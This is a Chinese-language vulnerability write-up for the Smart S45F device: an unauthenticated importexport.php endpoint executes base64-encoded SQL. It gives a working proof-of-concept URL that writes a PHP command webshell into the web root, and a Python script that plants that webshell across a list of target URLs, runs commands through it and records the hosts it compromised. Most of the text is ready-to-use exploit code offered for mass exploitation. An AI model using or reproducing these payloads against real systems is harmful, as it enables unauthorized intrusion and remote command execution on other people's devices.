原理
SQL语句执行接口未授权访问,可执行任意SQL语句。
影响范围
Smart S45F
危害
远程攻击者可利用该漏洞执行任意SQL语句,包括写入webshell。
POC & EXP
手工
漏洞位置:https://ip:port/importexport.php
该接口可以使用GET参数执行SQL语句
参数sql=base64编码的SQL语句
参数type=exportexcelbysql,执行动作
POC:
1
https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql
base64: select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/sec.php'
hex: <?php echo system($_POST["cmd"]);?>
一句话地址:https://ip:port/app/sec.php
脚本
import requests
proxies = {
'http': 'http://127.0.0.1:7890',
'https': 'http://127.0.0.1:7890'
}
url = []
with open("order.txt", "r") as file:
url = file.readlines()
file = open("get.txt", "w")
for i in url:
try:
response = requests.get(i + '/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql', proxies=proxies)
if response.status_code == 200:
response = requests.post(i + '/app/sec.php', data={'cmd': 'ipconfig'}, proxies=proxies)
if response.status_code == 200 and ("eth" in response.text):
print("get it!" + i)
file.write(i)
else:
print(str(response.status_code) + ": " + response.text)
except:
pass
file.close()